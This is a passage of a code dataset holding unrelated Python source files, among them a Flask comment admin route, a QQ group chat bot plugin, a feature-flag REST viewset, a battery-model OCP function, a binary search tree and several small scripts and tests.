test_get_voting_record_for_person_and_bill(self):\n\t\trecord = get_voting_record(person_id='400357', bill_id='339957')\n\t\tself.assertTrue(9 <= len(record))\n\t\tself.assertEqual(len(record[0]), 5)\n\n\tdef test_get_voting_record_for_person_and_vote(self):\n\t\trecord = get_voting_record(person_id='400357', vote_id='118137')\n\t\tself.assertEqual(len(record), 1)\n\t\tfor v in record:\n\t\t\tself.assertEqual(v['person_id'], 400357)\n\t\t\tself.assertEqual(v['vote_id'], 118137)\n\n","sub_path":"tests/test_vote.py","file_name":"test_vote.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"625488229","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint, request\nfrom ..libs.web_help import ops_render, iPagination\nfrom ..Config import settings\nfrom ..Model.Comment import Comment\nfrom sqlalchemy import or_\nroute_comment = Blueprint('comment', __name__, url_prefix='/comment')\n\n\n@route_comment.route(\"/index\")\ndef index():\n resp_data = {}\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n query = Comment.query\n if 'mix_kw' in req:\n rule = or_(Comment.content.ilike(\"%{0}%\".format(req['mix_kw'])), Comment.uid.ilike(\"%{0}%\".format(req['mix_kw'])), Comment.rid.ilike(\"%{0}%\".format(req['mix_kw'])))\n query = query.filter(rule)\n\n if 'status' in req and int(req['status']) > -1:\n query = query.filter(Comment.status == int(req['status']))\n\n page_params = {\n 'total': query.count(),\n 'page_size': settings.PAGE_SIZE,\n 'page': page,\n 'display': settings.PAGE_DISPLAY,\n 'url': request.full_path.replace(\"&p={}\".format(page), \"\")\n }\n\n pages = iPagination(page_params)\n offset = (page - 1) * settings.PAGE_SIZE\n list = query.order_by(Comment.id.desc()).offset(offset).limit(settings.PAGE_SIZE).all()\n\n resp_data['list'] = list\n resp_data['pages'] = pages\n resp_data['search_con'] = req\n resp_data['status_mapping'] = settings.STATUS_MAPPING\n resp_data['current'] = 'index'\n return ops_render(\"comment/index.html\", resp_data)\n\n@route_comment.route(\"/blacklist\")\ndef blacklist():\n resp_data = {}\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n query = Comment.query\n\n query = query.filter(Comment.status == -9999)\n\n page_params = {\n 'total': query.count(),\n 'page_size': settings.PAGE_SIZE,\n 'page': page,\n 'display': settings.PAGE_DISPLAY,\n 'url': request.full_path.replace(\"&p={}\".format(page), \"\")\n }\n\n pages = iPagination(page_params)\n offset = (page - 1) * settings.PAGE_SIZE\n list = query.order_by(Comment.id.desc()).offset(offset).limit(settings.PAGE_SIZE).all()\n\n resp_data['list'] = list\n resp_data['pages'] = pages\n resp_data['search_con'] = req\n resp_data['status_mapping'] = settings.STATUS_MAPPING\n resp_data['current'] = 'blacklist'\n return ops_render(\"comment/blacklist.html\", resp_data)\n\n","sub_path":"Backend/Web/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"164390943","text":"import pymongo\nimport json\nfrom pymongo import MongoClient\nfrom MHConsulter import *\n\nclient = MongoClient(\"localhost\", 27017)\ndb = client[\"mi-db\"]\n\n# Name\nprint(\"Nombre de la DB: \", db.name)\nprint(client.list_database_names())\n\nresultado = MHConsulter()\nresultado.setItemAilments()\nresultado.setAilmentId(\"6\")\nresultado.construirPeticion()\nresultado.ejecutarPeticion()\nresultado.transformText()\n\nprueba = resultado.serializationJson()\nprueba = json.dumps(prueba)\nprueba2 = json.loads(resultado.serializationJson())\n\n# Crea colección e inserta un registro\nprint(db.pet.insert_many([prueba2]))","sub_path":"Ene-Jun-2021/perez-arroyo-jose-fernando/Parcial_2/Practica_2/Parte 2/Insertar.py","file_name":"Insertar.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"551438437","text":"from nonebot import on_command, on_message, on_notice\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.cqhttp import Bot, Message, GroupMessageEvent, Event\nfrom .utils import to_me, get_path, scheduler\nfrom tinydb import TinyDB, Query\nimport time\nimport random\nimport re\n\n\nd_lim = TinyDB(get_path('temp.json'), encoding='utf-8').table(\"d_lim\")\nlimqq = Bot.config.limqq\nrepeat_msg_dict = {}\n\n# 复读\nrepeat = on_message(priority=5)\n@repeat.handle()\nasync def repeat_fun(bot: Bot, event: GroupMessageEvent, state: T_State):\n global repeat_msg_dict\n msg = str(event.get_message())\n groupid = event.group_id\n if groupid in repeat_msg_dict.keys():\n if repeat_msg_dict[groupid][0] == msg:\n repeat_msg_dict[groupid][1] += 1\n # 复读次数大于等于5 则加入复读\n if repeat_msg_dict[groupid][1] >= 5:\n del repeat_msg_dict[groupid]\n if random.random() > 0.1:\n await repeat.finish(Message(msg))\n else: # 有几率打断复读\n await repeat.finish('打断复读!')\n else:\n repeat_msg_dict[groupid] = [msg, 1]\n else:\n repeat_msg_dict[groupid] = [msg, 1]\n\n\n# 每日每个群捕捉一次lim\ncatch_lim = on_message(priority=5)\n@catch_lim.handle()\nasync def catch_lim_fun(bot: Bot, event: GroupMessageEvent, state: T_State):\n q = Query()\n if event.get_user_id() == str(limqq):\n if not(d_lim.contains(q.groupid == event.group_id) and d_lim.get(q.groupid == event.group_id)['d'] is True):\n msg = \"[CQ:reply,id=\" + str(event.message_id) + \"]\" + \\\n \"莉姆🤤嘿嘿.......莉姆🤤嘿嘿......莉姆🤤嘿嘿.......莉姆🤤嘿嘿......莉姆🤤嘿��.......莉姆🤤嘿嘿......\"\n if not d_lim.contains(q.groupid == event.group_id):\n d_lim.insert({'groupid': event.group_id, 'd': True})\n else:\n d_lim.update({'groupid': event.group_id, 'd': True}, q.groupid == event.group_id)\n await catch_lim.finish(Message(msg))\n\n\n# 5点重置dlim\n@scheduler.scheduled_job('cron', hour='5', minute='0', id='clear_d_times')\nasync def clear_d_times():\n d_lim.update({'d': False})\n\n\n# 晚安语音\ngood_night = on_command('晚安', rule=to_me(), priority=5)\n@good_night.handle()\nasync def send_good_night(bot: Bot, event: GroupMessageEvent, state: T_State):\n hour = time.localtime().tm_hour\n if hour >= 22 or hour <= 2:\n fil = re.compile(u'[^0-9a-zA-Z\\u4e00-\\u9fa5.,,。?“”]+', re.UNICODE)\n name = fil.sub(' ', event.sender.card) or fil.sub(' ', event.sender.nickname)\n message = fil.sub(' ', name) + \",晚安。\"\n message = Message('[CQ:tts,text=' + str(message) + ']')\n await good_night.finish(message)\n elif 17 <= hour < 22:\n message = \"才\" + str(hour - 12) + \"点。\"\n message = Message('[CQ:tts,text=' + str(message) + ']')\n await good_night.finish(message)\n\n\n# 群友发消息时随机戳一戳\npoke = on_message(priority=5)\n@poke.handle()\nasync def random_poke(bot: Bot, event: GroupMessageEvent, state: T_State):\n if random.random() < 0.006:\n message = Message('[CQ:poke,qq=' + str(event.get_user_id()) + ']')\n time.sleep(10)\n await poke.finish(message)\n","sub_path":"src/plugins/haruka_bot/auto_msg.py","file_name":"auto_msg.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"4500152","text":"# -*- coding: utf-8 -*-\n\nfrom django import template\n\nfrom admin_interface.models import Theme\n\n\nregister = template.Library()\n\n\n@register.assignment_tag(takes_context = True)\ndef get_admin_interface_theme(context):\n\n theme = None\n request = context.get('request', None)\n\n if request:\n theme = getattr(request, 'admin_interface_theme', None)\n\n if not theme:\n theme = Theme.get_active_theme()\n\n if request:\n request.admin_interface_theme = theme\n\n return theme\n\n","sub_path":"admin_interface/templatetags/admin_interface_tags.py","file_name":"admin_interface_tags.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"246580398","text":"class BinarySearchTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n # Insert the given value into the tree\n def insert(self, value):\n # If inserting, we must already have a tree/root\n if self.value is None:\n self.value = value\n return self.value\n # If value is less than self.value, go left, make a new tree/node, if empty. Otherwise, keep going (recursion)\n elif value < self.value:\n if self.left:\n return self.left.insert(value)\n else:\n self.left = BinarySearchTree(value)\n # If greater than or equal to self.value, go right, make a new tree/node, if empty. Otherwise, keep going (recursion)\n elif value >= self.value:\n if self.right:\n return self.right.insert(value)\n else:\n self.right = BinarySearchTree(value)\n\n # Return True if the tree contains the value\n # False if it does not\n def contains(self, target):\n # if target == self.value, return it\n if target == self.value:\n return True\n # otherwise, go left or right based on smaller or bigger\n elif target > self.value and self.right:\n # move right\n return self.right.contains(target)\n elif target < self.value and self.left:\n # move left\n return self.left.contains(target)\n return False","sub_path":"names/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"290173106","text":"#!/usr/bin/env python3.9\n\nfrom os.path import isfile\nfrom typing import Literal\n\nfrom bot import ROOT_DIR, SRBpp\n\nTOKEN_FILE: Literal[str] = f\"{ROOT_DIR}/token\"\n\n\ndef check_files() -> None:\n\t\"\"\"\n\tMake sure all required files are present.\n\t\"\"\"\n\tif not isfile(TOKEN_FILE):\n\t\ttoken = input(\"BOT SETUP - Enter bot token: \")\n\t\twith open(TOKEN_FILE, \"w+\", encoding=\"utf-8\") as f:\n\t\t\tf.write(token)\n\n\ndef _start() -> None:\n\t\"\"\"\n\tThe genesis function.\n\t\"\"\"\n\tcheck_files()\n\tbot = SRBpp()\n\tbot.run()\n\n\nif __name__ == \"__main__\":\n\t_start()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202564582","text":"\"\"\"\nhttps://github.com/Delgan/loguru\npip3 install loguru\n\"\"\"\nimport sys\n\nfrom loguru import logger\n\nlogger.add(sink=\"file_1.log\",\n level=\"INFO\",\n rotation=\"500 MB\",\n compression=\"zip\",\n retention=\"100 days\",\n # backtrace=False\n )\n\n\n@logger.catch\ndef my_function(x, y, z):\n # An error? It's catched anyway!\n return 1 / (x + y + z)\n\n\nconfig = {\n \"handlers\":[\n {\"sink\":sys.stdout, \"format\":\"{time} - {message}\"},\n {\"sink\": \"file_2.log\", \"serialize\": True}\n ]\n}\nlogger.configure(**config)\n\nif __name__ == \"__main__\":\n # logger.add(sys.stderr, format=\"{time} {level} {message}\", level=\"INFO\")\n\n logger.debug(\"That's it, beautiful and simple logging!\")\n logger.info(\"info\")\n print(my_function(0, 0, 0))\n\n new_level = logger.level(\"SNAKY\", no=38, color=\"\", icon=\"🐍\")\n\n logger.log(\"SNAKY\", \"Here we go!\")\n\n logger.info(\"=---\",{\"1\":1})\n\n # import notifiers\n\n # params = {\n # \"username\": \"you@gmail.com\",\n # \"password\": \"abc123\",\n # \"to\": \"dest@gmail.com\"\n # }\n\n\n # # Send a single notification\n # notifier = notifiers.get_notifier(\"email\")\n # notifier.notify(message=\"The application is running!\", **params)\n #\n # # Be alerted on each error message\n # from notifiers.logging import NotificationHandler\n #\n # handler = NotificationHandler(\"email\", defaults=params)\n # logger.add(handler, level=\"ERROR\")\n # print(my_function(0, 0, 0))\n\n\n","sub_path":"LanguageBasic/log_demo/loguru_demo.py","file_name":"loguru_demo.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"268170146","text":"'''\nTask Coach - Your friendly task manager\nCopyright (C) 2004-2008 Frank Niessink \n\nTask Coach is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nTask Coach is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n'''\n\nimport wx\nfrom taskcoachlib import meta\nfrom taskcoachlib.widgets import sized_controls\nfrom taskcoachlib.i18n import _\nfrom taskcoachlib.domain import date\nfrom taskcoachlib.gui import render\n\n\nclass ReminderDialog(sized_controls.SizedDialog):\n snoozeChoices = [_(\"Don't snooze\"), _('Five minutes'), _('Ten minutes'),\n _('Fifteen minutes'), _('Half an hour'), _('One hour'),\n _('Two hours'), _('24 hours')]\n snoozeTimes = [date.TimeDelta(minutes=minutes) for minutes in \\\n (0, 5, 10, 15, 30, 60, 120, 24*60)]\n \n def __init__(self, task, *args, **kwargs):\n kwargs['title'] = kwargs.get('title', meta.name + ' ' + _('Reminder'))\n super(ReminderDialog, self).__init__(*args, **kwargs)\n self.task = task\n self.openTaskAfterClose = False\n pane = self.GetContentsPane()\n pane.SetSizerType(\"form\")\n wx.StaticText(pane, label=_('Task') + ':')\n self.openTask = wx.Button(pane, label=self.task.subject(recursive=True))\n self.openTask.Bind(wx.EVT_BUTTON, self.onOpenTask)\n for label in _('Reminder date/time') + ':', \\\n render.dateTime(self.task.reminder()), _('Snooze') + ':':\n wx.StaticText(pane, label=label)\n self.snoozeOptions = wx.ComboBox(pane)\n for choice, timeDelta in zip(self.snoozeChoices, self.snoozeTimes):\n self.snoozeOptions.Append(choice, timeDelta)\n self.snoozeOptions.SetSelection(0)\n self.SetButtonSizer(self.CreateStdDialogButtonSizer(wx.OK))\n self.Bind(wx.EVT_BUTTON, lambda event: self.Close())\n self.Fit()\n\n def onOpenTask(self, event):\n self.openTaskAfterClose = True\n self.Close()\n\n\n","sub_path":"branches/Release0_72_Branch/taskcoachlib/gui/dialog/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"643151472","text":"from pybamm import tanh\n\n\ndef lico2_ocp_Dualfoil1998(sto):\n \"\"\"\n Lithium Cobalt Oxide (LiCO2) Open Circuit Potential (OCP) as a a function of the\n stochiometry. The fit is taken from Dualfoil [1]. Dualfoil states that the data\n was measured by Oscar Garcia 2001 using Quallion electrodes for 0.5 < sto < 0.99\n and by Marc Doyle for sto<0.4 (for unstated electrodes). We could not find any\n other records of the Garcia measurements. Doyles fits can be found in his\n thesis [2] but we could not find any other record of his measurments.\n\n References\n ----------\n .. [1] http://www.cchem.berkeley.edu/jsngrp/fortran.html\n .. [2] CM Doyle. Design and simulation of lithium rechargeable batteries,\n 1995.\n\n Parameters\n ----------\n sto : :class:`pybamm.Symbol`\n Stochiometry of material (li-fraction)\n\n \"\"\"\n\n stretch = 1.062\n sto = stretch * sto\n\n u_eq = (\n 2.16216\n + 0.07645 * tanh(30.834 - 54.4806 * sto)\n + 2.1581 * tanh(52.294 - 50.294 * sto)\n - 0.14169 * tanh(11.0923 - 19.8543 * sto)\n + 0.2051 * tanh(1.4684 - 5.4888 * sto)\n + 0.2531 * tanh((-sto + 0.56478) / 0.1316)\n - 0.02167 * tanh((sto - 0.525) / 0.006)\n )\n\n return u_eq\n","sub_path":"pybamm/input/parameters/lithium-ion/positive_electrodes/lico2_Marquis2019/lico2_ocp_Dualfoil1998.py","file_name":"lico2_ocp_Dualfoil1998.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"443659215","text":"import requests\nimport json\n\n\n# 封装采用json编码格式的请求\n\nclass myrequests:\n\n def __init__(self, url):\n self.url = url\n self.header = {'content-type': 'application/json'}\n\n def myget(self):\n try:\n r = requests.get(self.url)\n return r.text, r.status_code\n except Exception as e:\n print('post请求出错,原因:%s' % e)\n\n def mypost(self, param):\n try:\n data = json.dumps(param)\n r = requests.post(self.url, data=data, headers=self.header,stream=True, verify=False)\n json_response = json.loads(r.text)\n return json_response\n except Exception as e:\n print('post请求出错,原因:%s' % e)\n\n\n# obj = myrequests('http://10.1.219.12:7017/ad/resetPWD')\n# data = {\n# \"id\":\"992200\",\n# \"newPwd\":\"Mw123456\"\n# }\n# res = obj.mypost(data)\n# print(res)\n# print(type(res))\n","sub_path":"util/Httprequests.py","file_name":"Httprequests.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"479114858","text":"import numpy as np\n\nN, B, K = map(int, input().split())\nC = list(map(int, input().split()))\nMOD = 10 ** 9 + 7\n\n# DP の漸化式が同じ場合は, 行列の繰り返し二乗法によって求めることができる\n# numpy を使う場合は, np.int32 ではoverflowが起こるので, 'dtype=object' を指定する\n# numpy 実装による高速化の恩恵がない?\ndef power_matrix_under_mod(mat, n, p):\n res = np.identity(B, dtype=object)\n bi = str(format(n, \"b\")) # 2進表現に\n for i in range(len(bi)):\n res = np.dot(res, res)\n res = np.mod(res, p)\n if bi[i] == \"1\":\n res = np.dot(res, mat)\n res = np.mod(res, p)\n return res\n\n\n# 行列の累乗を行う\ndp_matrix = np.zeros((B, B), dtype=object)\nfor b in range(B):\n for c in C:\n b_ = (10 * b + c) % B\n dp_matrix[b][b_] += 1\n\nprint(power_matrix_under_mod(dp_matrix, N, MOD)[0][0])\n","sub_path":"pysol/005-02.py","file_name":"005-02.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371274750","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nimport pytest\nimport mindspore.dataset as ds\nfrom mindspore import log as logger\n\nDATASET_FILE = \"../data/mindrecord/testGraphData/testdata\"\n\n\ndef test_graphdata_getfullneighbor():\n g = ds.GraphData(DATASET_FILE, 2)\n nodes = g.get_all_nodes(1)\n assert len(nodes) == 10\n nodes_list = nodes.tolist()\n neighbor = g.get_all_neighbors(nodes_list, 2)\n assert neighbor.shape == (10, 6)\n row_tensor = g.get_node_feature(neighbor.tolist(), [2, 3])\n assert row_tensor[0].shape == (10, 6)\n\n\ndef test_graphdata_getnodefeature_input_check():\n g = ds.GraphData(DATASET_FILE)\n with pytest.raises(TypeError):\n input_list = [1, [1, 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], 1]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1, 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1, 1], [1, 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, [1, 1]]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [[1, 1], 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1]]\n g.get_node_feature(input_list, 1)\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1]]\n g.get_node_feature(input_list, [\"a\"])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1]]\n g.get_node_feature(input_list, [1, \"a\"])\n\n\nif __name__ == '__main__':\n test_graphdata_getfullneighbor()\n logger.info('test_graphdata_getfullneighbor Ended.\\n')\n test_graphdata_getnodefeature_input_check()\n logger.info('test_graphdata_getnodefeature_input_check Ended.\\n')\n","sub_path":"tests/ut/python/dataset/test_graphdata.py","file_name":"test_graphdata.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570571251","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 2 11:29:05 2018\n\n@author: Mr_Mey\n\"\"\"\n\nfrom connector import Connector\nfrom grid.grid import Grid\nfrom decision import Actor\n\nimport os\nimport time\nimport struct\n\n\nactor = Actor()\n\nos.popen(\"VampiresVSWerewolvesGameServer.exe\")\n\nname = 'paul'\n\nconn = Connector(\"127.0.0.1\",5555)\n\n# envoit sequence NME\nconn.send(\"NME\".encode()+struct.pack(\"1B\",len(name))+name.encode())\n\n# recoit commande SET\nSet = conn.receive()\n# initialise la carte\ngrid = Grid(Set[1][0],Set[1][1])\n\n# recoit HME --inutile mais il faut quand même le recevoir\nconn.receive()\n# recoit HME --inutile mais il faut quand même le recevoir\nconn.receive()\n\n# \nMap = conn.receive()\ngrid.update_all_groups(Map[1])\n\n# tant que la partie est active\nwhile conn.connected:\n \n # ecoute le serveur\n order = conn.receive()\n if order[0] == \"UPD\":\n #update la grille\n grid.update_all_groups(order[1])\n print(\"map {}\".format([grid.height,grid.width]))\n elif order[0] == \"BYE\":\n # to do clean break\n break\n elif order[0] == \"END\":\n # to do clean break\n break\n \n # take decision\n actor.action(grid)\n \n # envoyer file d'actions au serveur\n conn.send(actor.send_moves())\n # vider la file d'action pour prochain tour\n actor.clean_moves()\n # attendre une seconde pour visualiser sur .exe\n time.sleep(2)\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"488862256","text":"'''\nQuestion:\nDefine a class with a generator which can iterate the numbers, which are divisible by 7, between a given range 0 and n.\n'''\n\n\nclass Exercice20:\n def divisible_by_7(self, n):\n for i in range(0, n + 1):\n if i % 7 == 0:\n yield i\n\n\nex = Exercice20()\nfor i in ex.divisible_by_7(100):\n print(i)\n","sub_path":"ex20.py","file_name":"ex20.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"291761555","text":"from threading import Thread\n\nimport coreapi\nfrom rest_framework import status, viewsets\nfrom rest_framework.generics import GenericAPIView, get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.schemas import AutoSchema\n\nfrom analytics.utils import track_event\nfrom environments.models import Environment, Identity\nfrom projects.models import Project\nfrom .models import FeatureState, Feature\nfrom .serializers import FeatureStateSerializerBasic, FeatureStateSerializerFull, \\\n FeatureStateSerializerCreate, CreateFeatureSerializer, FeatureSerializer, \\\n FeatureStateValueSerializer\n\n\nclass FeatureViewSet(viewsets.ModelViewSet):\n queryset = Feature.objects.all()\n\n def get_serializer_class(self):\n if self.action == 'create':\n return CreateFeatureSerializer\n else:\n return FeatureSerializer\n\n def get_queryset(self):\n project = Project.objects.get(pk=self.kwargs['project_pk'])\n return project.features.all()\n\n\nclass FeatureStateViewSet(viewsets.ModelViewSet):\n \"\"\"\n View set to manage feature states. Nested beneath environments and environments + identities\n to allow for filtering on both.\n\n list:\n Get feature states for an environment or identity if provided\n\n create:\n Create feature state for an environment or identity if provided\n\n retrieve:\n Get specific feature state\n\n update:\n Update specific feature state\n\n partial_update:\n Partially update specific feature state\n\n delete:\n Delete specific feature state\n \"\"\"\n\n # Override serializer class to show correct information in docs\n def get_serializer_class(self):\n\n if self.action not in ['list', 'retrieve']:\n return FeatureStateSerializerCreate\n else:\n return FeatureStateSerializerBasic\n\n def get_queryset(self):\n \"\"\"\n Override queryset to filter based on provided URL parameters.\n \"\"\"\n environment_api_key = self.kwargs['environment_api_key']\n identifier = self.kwargs.get('identity_identifier')\n environment = Environment.objects.get(api_key=environment_api_key)\n\n if identifier:\n identity = Identity.objects.get(\n identifier=identifier, environment=environment)\n else:\n identity = None\n\n return FeatureState.objects.filter(environment=environment, identity=identity)\n\n def get_environment_from_request(self):\n \"\"\"\n Get environment object from URL parameters in request.\n \"\"\"\n environment = Environment.objects.get(\n api_key=self.kwargs['environment_api_key'])\n return environment\n\n def get_identity_from_request(self, environment):\n \"\"\"\n Get identity object from URL parameters in request.\n \"\"\"\n identity = Identity.objects.get(identifier=self.kwargs['identity_identifier'],\n environment=environment)\n return identity\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n Override create method to add environment and identity (if present) from URL parameters.\n \"\"\"\n data = request.data\n environment = self.get_environment_from_request()\n data['environment'] = environment.id\n\n if 'feature' not in data:\n error = {\"detail\": \"Feature not provided\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n feature_id = int(data['feature'])\n\n if feature_id not in [feature.id for feature in environment.project.features.all()]:\n error = {\"detail\": \"Feature does not exist in project\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n if self.kwargs.get('identity_identifier', None):\n identity = self.get_identity_from_request(environment)\n data['identity'] = identity.id\n\n serializer = FeatureStateSerializerBasic(data=data)\n if serializer.is_valid():\n feature_state = serializer.save()\n headers = self.get_success_headers(serializer.data)\n\n if 'feature_state_value' in data:\n self.update_feature_state_value(feature_state.feature_state_value,\n data['feature_state_value'], feature_state)\n\n return Response(FeatureStateSerializerBasic(feature_state).data,\n status=status.HTTP_201_CREATED, headers=headers)\n else:\n error = {\"detail\": \"Couldn't create feature state.\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n def update(self, request, *args, **kwargs):\n \"\"\"\n Override update method to always assume update request is partial and create / update\n feature state value.\n \"\"\"\n feature_state_to_update = self.get_object()\n feature_state_data = request.data\n\n # Check if feature state value was provided with request data. If so, create / update\n # feature state value object and associate with feature state.\n if 'feature_state_value' in feature_state_data:\n feature_state_value = self.update_feature_state_value(\n feature_state_to_update.feature_state_value,\n feature_state_data['feature_state_value'],\n feature_state_to_update\n )\n\n if isinstance(feature_state_value, Response):\n return feature_state_value\n\n feature_state_data['feature_state_value'] = feature_state_value.id\n\n serializer = FeatureStateSerializerBasic(feature_state_to_update, data=feature_state_data,\n partial=True)\n serializer.is_valid(raise_exception=True)\n self.perform_update(serializer)\n\n if getattr(feature_state_to_update, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # refresh the instance from the database.\n feature_state_to_update = self.get_object()\n serializer = self.get_serializer(feature_state_to_update)\n\n return Response(serializer.data)\n\n def partial_update(self, request, *args, **kwargs):\n \"\"\"\n Override partial_update as overridden update method assumes partial True for all requests.\n \"\"\"\n return self.update(request, *args, **kwargs)\n\n def update_feature_state_value(self, instance, value, feature_state):\n feature_state_value_dict = feature_state.generate_feature_state_value_data(\n value)\n\n feature_state_value_serializer = FeatureStateValueSerializer(\n instance=instance,\n data=feature_state_value_dict\n )\n\n if feature_state_value_serializer.is_valid():\n feature_state_value = feature_state_value_serializer.save()\n else:\n return Response(feature_state_value_serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n return feature_state_value\n\n\nclass SDKFeatureStates(GenericAPIView):\n serializer_class = FeatureStateSerializerFull\n permission_classes = (AllowAny,)\n\n schema = AutoSchema(\n manual_fields=[\n coreapi.Field(\"X-Environment-Key\", location=\"header\",\n description=\"API Key for an Environment\"),\n coreapi.Field(\"feature\", location=\"query\",\n description=\"Name of the feature to get the state of\")\n ]\n )\n\n def get(self, request, identifier=None, *args, **kwargs):\n if 'HTTP_X_ENVIRONMENT_KEY' not in request.META:\n error = {\"detail\": \"Environment Key header not provided\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n environment_key = request.META['HTTP_X_ENVIRONMENT_KEY']\n environment = Environment.objects.select_related('project', 'project__organisation').get(api_key=environment_key)\n\n if identifier:\n track_event(environment.project.organisation.name, \"identity_flags\")\n\n identity, _ = Identity.objects.get_or_create(\n identifier=identifier,\n environment=environment,\n )\n else:\n track_event(environment.project.organisation.name, \"flags\")\n identity = None\n\n kwargs = {\n 'identity': identity,\n 'environment': environment,\n }\n\n if 'feature' in request.GET:\n kwargs['feature__name__iexact'] = request.GET['feature']\n try:\n if identity:\n feature_state = identity.get_all_feature_states().get(\n feature__name__iexact=kwargs['feature__name__iexact'],\n )\n else:\n feature_state = FeatureState.objects.get(**kwargs)\n except FeatureState.DoesNotExist:\n return Response(\n {\"detail\": \"Given feature not found\"},\n status=status.HTTP_404_NOT_FOUND\n )\n\n return Response(self.get_serializer(feature_state).data, status=status.HTTP_200_OK)\n\n if identity:\n flags = self.get_serializer(\n identity.get_all_feature_states(), many=True)\n return Response(flags.data, status=status.HTTP_200_OK)\n\n environment_flags = FeatureState.objects.filter(**kwargs).select_related(\"feature\", \"feature_state_value\")\n return Response(\n self.get_serializer(environment_flags, many=True).data,\n status=status.HTTP_200_OK\n )\n\n\ndef organisation_has_got_feature(request, organisation):\n \"\"\"\n Helper method to set flag against organisation to confirm that they've requested their\n feature states for analytics purposes\n\n :param request: HTTP request\n :return: True if value set. None otherwise.\n \"\"\"\n if organisation.has_requested_features:\n return None\n\n referer = request.META.get(\"HTTP_REFERER\")\n if not referer or \"bullet-train.io\" in referer:\n return None\n else:\n organisation.has_requested_features = True\n organisation.save()\n return True\n","sub_path":"src/features/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"411031662","text":"#%%\nfrom sklearn import linear_model, decomposition, ensemble, preprocessing, isotonic, metrics\nfrom sklearn.ensemble import RandomForestClassifier as RF\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import Imputer\nfrom 